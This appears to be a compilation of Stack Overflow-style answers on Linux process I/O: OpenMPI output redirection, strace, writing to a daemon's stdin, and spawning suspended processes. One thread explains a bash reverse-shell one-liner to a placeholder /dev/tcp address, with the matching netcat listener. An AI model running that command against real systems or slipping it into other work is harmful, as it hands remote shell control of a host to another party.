OpenMPI: have each process write to stdout

Child processes started by mpirun redirect their output to the mpirun process, so all output ends up on one node.
Instead, I'd like each of the processes spawned by MPI to write to STDOUT on their own nodes, or to a file or named pipe.
I read the FAQ and tried out some things:
mpirun -host host1,host2 my_script >&1
Just redirects stdout from all hosts to stdout on the invoking node (like the default). Doing
mpirun -host host1,host2 my_script
Where my_script redirects output to >&1 just captures output from processes on the invoking node.
Is there a way I can get each node to write to its local filesystem (for example) without redirecting to the invoking node's mpirun process?
Thanks.

Open MPI has the --output-filename option; it is pretty close to, but not exactly, what you are asking for.
I do not think there is a native way to achieve exactly what you expect.
That being said, it can easily be achieved via a wrapper.
For example, via the command line:
mpirun --host host1,host2 sh -c 'my_script > /tmp/log.$OMPI_COMM_WORLD_RANK'
Each MPI task will redirect its stdout to /tmp/log.<id>.
Another method is to use the fork_agent:
mpirun --host host1,host2 --mca orte_fork_agent /.../wrapper my_script
Basically, instead of exec'ing my_script, Open MPI will exec /.../wrapper my_script. With a bit of creativity, the wrapper you write can do whatever you need.
Within this wrapper, you will likely want to check the following environment variables (a minimal wrapper sketch follows the list):
OMPI_COMM_WORLD_SIZE
OMPI_COMM_WORLD_RANK
OMPI_COMM_WORLD_LOCAL_SIZE
OMPI_COMM_WORLD_LOCAL_RANK
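For illustration, a minimal wrapper along these lines could redirect each rank's output to a per-rank file on the node-local filesystem (the /tmp path is just an example, and capturing stderr as well is optional):
#!/bin/sh
# hypothetical fork_agent wrapper: the command to run arrives as the arguments,
# so redirect this rank's output to a node-local, per-rank file and exec it
exec "$@" > /tmp/log.$OMPI_COMM_WORLD_RANK 2>&1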

Related

Get stdout from other program in Linux

On Linux, I want to get the stdout of a running NodeJS program from another NodeJS program or from bash.
I have the PID or the name of the program, and I want to get the data into a function in real time.
Maybe by touching files in /proc?
Is this possible?
You can use strace -e write -p <pid> to see what the program is writing to stdout (or other FDs) in real time. It does not show what was written earlier, and it needs a little parsing to extract clean stdout contents.
By default, it truncates the shown writes to only 32 characters. To show more, use the -s switch:
strace -e write -s 9999 -p <pid>
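If you only care about stdout, the trace can be filtered for writes to file descriptor 1; a rough sketch (strace prints its trace on stderr, hence the 2>&1):
strace -e write -s 9999 -p <pid> 2>&1 | grep 'write(1,'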

Is it possible to pass input to a running service or daemon?

I want to create a Java console application that runs as a daemon on Linux. I have created the application and the script to run it as a background daemon. The application runs and waits for command-line input.
My question:
Is it possible to pass command line input to a running daemon?
On Linux, all running processes have a special directory under /proc containing information and hooks into the process. Each subdirectory of /proc is the PID of a running process. So if you know the PID of a particular process you can get information about it. E.g.:
$ sleep 100 & ls /proc/$!
...
cmdline
...
cwd
environ
exe
fd
fdinfo
...
status
...
Of note is the fd directory, which contains all the file descriptors associated with the process. 0, 1, and 2 exist for (almost?) all processes, and 0 is the default stdin. So writing to /proc/$PID/fd/0 will write to that process' stdin.
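As a quick illustration (assuming $PID holds the target PID; note that if fd 0 is a terminal, the text tends to appear on that terminal rather than being read by the process, so this works best when stdin is a pipe):
echo "some command" > /proc/$PID/fd/0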
A more robust alternative is to set up a named pipe connected to your process' stdin; then you can write to that pipe and the process will read it without needing to rely on the /proc file system.
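A minimal sketch of that approach (the pipe path and daemon name are illustrative):
mkfifo /tmp/daemon_in
my_daemon < /tmp/daemon_in &    # start the daemon reading from the pipe
exec 3> /tmp/daemon_in          # keep a writer open so the daemon never sees EOF
echo "some command" > /tmp/daemon_in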
See also Writing to stdin of background process on ServerFault.
The accepted answer above didn't quite work for me, so here's my implementation.
For context, I'm running a Minecraft server as a Linux daemon managed with systemctl. I wanted to be able to send commands to its stdin (StandardInput).
First, use mkfifo /home/user/server_input to create a FIFO file somewhere (also known as the 'named pipe' solution mentioned above).
Then, in your daemon's *.service file, execute the bash script that runs your server or background program and set the StandardInput directive to the FIFO file we just created:
[Service]
ExecStart=/usr/local/bin/minecraft.sh
StandardInput=file:/home/user/server_input
In minecraft.sh, the following is the key command that runs the server and gets input piped into the console of the running service:
tail -f /home/user/server_input | java -Xms1024M -Xmx4096M -jar /path/to/server.jar nogui
Finally, run systemctl start your_daemon_service; to pass input commands, simply use:
echo "command" > /home/user/server_input
Credit to the answers given on ServerFault.

Monitoring all running process using strace in shell script

I want to monitor all running processes using strace, and when a process ends, the strace output should be sent to a file.
How do I find the PID of every running process? I also want to include the process name in the output file.
$ sudo strace -p 1725 -o firefox_trace.txt
$ tail -f firefox_trace.txt
1725 would be the PID of the process you want to monitor (you can find the PID with "ps -C firefox-bin" for Firefox in this example),
and firefox_trace.txt would be the output file.
The way to go would be to find the PID of every running process and use this command to write each trace to the output file.
Considering the doc:
-p pid
Attach to the process with the process ID pid and begin tracing. The trace may be terminated at any time by a keyboard interrupt signal (CTRL-C). strace will respond by detaching itself from the traced process(es), leaving it (them) to continue running. Multiple -p options can be used to attach to up to 32 processes in addition to command (which is optional if at least one -p option is given).
Use -o to store the output in a file, or 2>&1 to redirect standard error to standard output so you can filter it (grep) or redirect it into a file (> file).
To monitor a process by name rather than by PID, you can use the pgrep command, e.g.
strace -p $(pgrep command) -o file.out
where command is the name of your process (e.g. php, Chrome, etc.).
To learn more about parameters, check man strace.
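To get closer to what the question asks (one trace per process, with the process name in the file name), a rough sketch along these lines could work; the process name and output directory are only examples:
for pid in $(pgrep my_program); do
    name=$(cat /proc/$pid/comm)                      # process name from /proc
    sudo strace -p "$pid" -o "/tmp/${name}_${pid}.trace" &
done
wait    # each trace file is complete once its process (and therefore strace) exits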

Testing Bash Reverse Shell

I am testing a reverse shell using the tutorial found here.
I have some questions about the meaning of the command used. The command to run on the server is the following:
/bin/bash > /dev/tcp/<IP>/<port> 0<&1 2>&1
I want to double check its meaning. Based on my understanding:
Start a bash shell
Redirect output of the shell to TCP connection <IP>:<port>
0<&1: Redirect Input from connection &1 to stdin 0
2>&1: Redirect output from stderr 2 to connection &1
Is the above correct ?
Yes, it's correct; the goal is for all three FDs -- stdin, stdout, and stderr -- to be pointing to your TCP connection.
Note that this command needs to be run in a bash compiled with /dev/tcp, which is an optional feature provided by the shell itself, not the operating system; moreover, this means that something like system(), which uses /bin/sh, typically won't work to invoke it.
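To actually test it, something has to be listening on <IP>:<port> before the bash command is run; a netcat listener is the usual choice (flag syntax varies between netcat variants; this is the traditional form):
nc -l -v -p <port>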
For STDOUT, use 1>&1, because 2 will redirect the STDERR stream.
So your command should be:
/bin/bash > /dev/tcp/<IP>/<port> 0<&1 1>&1

linux: suspend process at startup

I would like to spawn a process suspended, possibly in the context of another user (e.g. via sudo -u ...), set up some iptables rules for the spawned process, continue running the process, and remove the iptables rules when the process exits.
Is there any standard means (bash, coreutils, etc.) that allows me to achieve the above? In particular, how can I spawn a process in a suspended state and get its PID?
Write a wrapper script start-stopped.sh like this:
#!/bin/sh
kill -STOP $$ # suspend myself
# ... until I receive SIGCONT
exec "$@" # exec argument list
And then call it like:
sudo -u $SOME_USER start-stopped.sh mycommand & # start mycommand in stopped state
MYCOMMAND_PID=$!
setup_iptables $MYCOMMAND_PID # use its PID to setup iptables
sudo -u $SOME_USER kill -CONT $MYCOMMAND_PID # make mycommand continue
wait $MYCOMMAND_PID # wait for its termination
MYCOMMAND_EXIT_STATUS=$?
teardown_iptables # remove iptables rules
report $MYCOMMAND_EXIT_STATUS # report errors, if necessary
All this is overkill, however. You don't need to spawn your process in a suspended state to get the job done. Just make a wrapper script setup_iptables_and_start:
#!/bin/sh
setup_iptables $$ # use my own PID to setup iptables
exec sudo -u $SOME_USER "$@" # exec'ed command will have same PID
And then call it like
setup_iptables_and_start mycommand || report errors
teardown_iptables
You can write a C wrapper for your program that will do something like this:
Fork and print the child PID.
In the child, wait for the user to press Enter. This keeps the child sleeping, and you can add the rules using its PID.
Once the rules are added, the user presses Enter and the child runs your original program, either using exec or system.
Will this work?
Edit:
Actually, you can do the above procedure with a shell script. Try the following bash script:
#!/bin/bash
echo "Pid is $$"
echo -n "Press Enter.."
read
exec "$@"
You can run this as /bin/bash ./run.sh <your command>
One way to do it is to enlist gdb to pause the program at the start of its main function (using the command "break main"). This will guarantee that the process is suspended fast enough (although some initialisation routines can run before main, they probably won't do anything relevant). However, for this you will need debugging information for the program you want to start suspended.
I suggest you try this manually first, see how it works, and then work out how to script what you've done.
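A rough sketch of the gdb approach (the program name is illustrative):
gdb -ex 'break main' -ex run --args my_program its_args
# when the breakpoint hits:
#   (gdb) info inferiors    # shows the PID of the stopped process
#   ... set up the iptables rules from another shell ...
#   (gdb) continue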
Alternatively, it may be possible to constrain the process (if indeed that is what you're trying to do!) without using iptables, using SELinux or a ptrace-based tool like sydbox instead.
I suppose you could write a small utility yourself that forks, where the child of the fork suspends itself just before doing an exec. Otherwise, consider using an LD_PRELOAD library to do your 'custom' business.
If you care about making that secure, you should probably look at bigger guns (chroot, perhaps paravirtualization, User Mode Linux, etc.).
Last tip: if you don't mind doing some more coding, the ptrace interface should allow you to do what you describe (it is what debuggers are implemented with).
You probably need the PID of a program you're starting before that program actually starts running. You could do it like this (a sketch follows the list):
Start a plain script.
Force the script to wait.
You can probably use suspend, which is a bash builtin, but in the worst case you can make it stop itself with a signal.
Use the PID of the bash process in every way you want.
Restart the stopped bash process (SIGCONT) and do an exec (another builtin) starting your real process (it will inherit the PID).
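A condensed sketch of those steps (the program name is illustrative):
bash -c 'kill -STOP $$; exec my_real_program' &    # the script stops itself right away
pid=$!                                             # the PID is known before the real program runs
# ... use $pid here, e.g. to set up iptables rules ...
kill -CONT "$pid"                                  # let it continue; exec keeps the same PID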
